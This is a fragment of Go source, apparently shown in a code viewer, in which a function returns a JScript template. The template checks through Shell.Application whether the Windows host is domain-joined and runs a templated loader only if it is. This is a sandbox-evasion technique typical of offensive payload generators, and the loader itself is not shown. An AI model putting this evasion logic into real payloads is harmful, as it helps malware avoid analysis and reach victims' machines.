()
| 202 | } |
| 203 | |
| 204 | func WScript_Sandbox() string { |
| 205 | return ` |
| 206 | var {{.Variables.objShell}} = new ActiveXObject("Shell.Application") |
| 207 | var {{.Variables.domain}} = {{.Variables.objShell}}.GetSystemInformation("IsOS_DomainMember"); |
| 208 | if ({{.Variables.domain}} == 0 ){ |
| 209 | } |
| 210 | else { |
| 211 | {{.Variables.loader}} |
| 212 | } |
| 213 | ` |
| 214 | } |
no outgoing calls
no test coverage detected